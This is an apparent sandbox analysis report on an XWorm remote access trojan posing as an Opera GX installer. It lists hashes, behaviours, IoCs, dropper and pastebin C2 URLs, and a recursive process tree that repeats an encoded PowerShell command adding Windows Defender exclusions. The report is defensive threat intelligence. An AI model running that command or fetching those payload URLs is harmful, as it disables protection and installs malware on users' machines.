xworm | e0176bf1acaea751b8d442619caa6959fcd9c4887e5d683f00bbe8a2354d1a47

Analysis

max time kernel
1s
max time network
29s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
06/03/2025, 17:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

OperaGXSetup.exe
Size

3.9MB
MD5

331950dc665052789dc9fcb607cc10af
SHA1

8d1844ecd27a34256f5a87721c871de3ce8d86a3
SHA256

e0176bf1acaea751b8d442619caa6959fcd9c4887e5d683f00bbe8a2354d1a47
SHA512

a0af358f927789c55ce583e6949bca0fe5b7fcb7ba3b18e56854ea81576dd8630fb1d3b4147b140d75800bb24291d00767dfc1e49441c9cb643fdf917c1a034c
SSDEEP

98304:FbTeX1UoBvNOXAsA9wsS9w8dinuqwpMMvcVUwf:FePZNOXDAyLw5NwKUw

Score

10^/10

xworm defense_evasion discovery execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

xworm

Attributes

Install_directory
%port%
install_file
svchost.exe
pastebin_url
https://pastebin.com/raw/J42c6s7r

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000d000000023c66-4.dat	family_xworm
behavioral1/memory/4444-13-0x0000000000EF0000-0x0000000000F04000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3448	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation	OperaGXSetup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation	OperaGXSetup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation	OperaGXSetup.exe

Executes dropped EXE 3 IoCs

pid	Process
4444	Credential Guard & VBS Key Isolation.exe
4468	Credential Guard & VBS Key Isolation.exe
4536	Credential Guard & VBS Key Isolation.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
18	pastebin.com
19	pastebin.com
23	pastebin.com
24	pastebin.com
25	pastebin.com
26	pastebin.com
10	raw.githubusercontent.com
11	raw.githubusercontent.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	OperaGXSetup.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	OperaGXSetup.exe
File created	C:\Windows\Credential Guard & VBS Key Isolation.exe	OperaGXSetup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OperaGXSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OperaGXSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OperaGXSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OperaGXSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
5972	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5280	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
5024	powershell.exe
2864	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4444	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	4468	Credential Guard & VBS Key Isolation.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	5024	powershell.exe
Token: SeDebugPrivilege	4536	Credential Guard & VBS Key Isolation.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 4488 wrote to memory of 2864	4488	OperaGXSetup.exe	84
PID 4488 wrote to memory of 2864	4488	OperaGXSetup.exe	84
PID 4488 wrote to memory of 2864	4488	OperaGXSetup.exe	84
PID 4488 wrote to memory of 3992	4488	OperaGXSetup.exe	86
PID 4488 wrote to memory of 3992	4488	OperaGXSetup.exe	86
PID 4488 wrote to memory of 3992	4488	OperaGXSetup.exe	86
PID 4488 wrote to memory of 4444	4488	OperaGXSetup.exe	87
PID 4488 wrote to memory of 4444	4488	OperaGXSetup.exe	87
PID 3992 wrote to memory of 5024	3992	OperaGXSetup.exe	89
PID 3992 wrote to memory of 5024	3992	OperaGXSetup.exe	89
PID 3992 wrote to memory of 5024	3992	OperaGXSetup.exe	89
PID 3992 wrote to memory of 2908	3992	OperaGXSetup.exe	91
PID 3992 wrote to memory of 2908	3992	OperaGXSetup.exe	91
PID 3992 wrote to memory of 2908	3992	OperaGXSetup.exe	91
PID 3992 wrote to memory of 4468	3992	OperaGXSetup.exe	92
PID 3992 wrote to memory of 4468	3992	OperaGXSetup.exe	92
PID 2908 wrote to memory of 1912	2908	OperaGXSetup.exe	93
PID 2908 wrote to memory of 1912	2908	OperaGXSetup.exe	93
PID 2908 wrote to memory of 1912	2908	OperaGXSetup.exe	93
PID 2908 wrote to memory of 644	2908	OperaGXSetup.exe	94
PID 2908 wrote to memory of 644	2908	OperaGXSetup.exe	94
PID 2908 wrote to memory of 644	2908	OperaGXSetup.exe	94
PID 2908 wrote to memory of 4536	2908	OperaGXSetup.exe	96
PID 2908 wrote to memory of 4536	2908	OperaGXSetup.exe	96

C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
"C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4488
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2864
- C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
  "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
  2⤵
  - Checks computer location settings
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3992
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5024
- - C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
    3⤵
    - Checks computer location settings
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2908
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
      4⤵
      System Location Discovery: System Language Discovery
      PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
      "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:644
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        5⤵
        
        PID:3528
    - - C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        5⤵
        
        PID:4176
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        6⤵
        
        PID:3232
      - C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        6⤵
        
        PID:3628
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        7⤵
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        7⤵
        
        PID:3844
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        8⤵
        
        PID:3284
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        8⤵
        
        PID:1164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        9⤵
        
        PID:3840
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        9⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        10⤵
        
        PID:2316
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        10⤵
        
        PID:2012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        11⤵
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        11⤵
        
        PID:3884
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        12⤵
        
        PID:1296
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        12⤵
        
        PID:940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        13⤵
        
        PID:2328
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        13⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        14⤵
        
        PID:836
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        14⤵
        
        PID:3884
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        15⤵
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        15⤵
        
        PID:1408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        16⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        16⤵
        
        PID:2808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        17⤵
        
        PID:5360
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        17⤵
        
        PID:5396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        18⤵
        
        PID:5636
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        18⤵
        
        PID:5644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        19⤵
        
        PID:5936
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        19⤵
        
        PID:5944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        20⤵
        
        PID:3416
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        20⤵
        
        PID:4908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        21⤵
        
        PID:5808
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        21⤵
        
        PID:5888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        22⤵
        
        PID:4488
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        22⤵
        
        PID:720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        23⤵
        
        PID:5180
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        23⤵
        
        PID:2808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        24⤵
        
        PID:5948
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        24⤵
        
        PID:5968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        25⤵
        
        PID:1812
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        25⤵
        
        PID:2808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
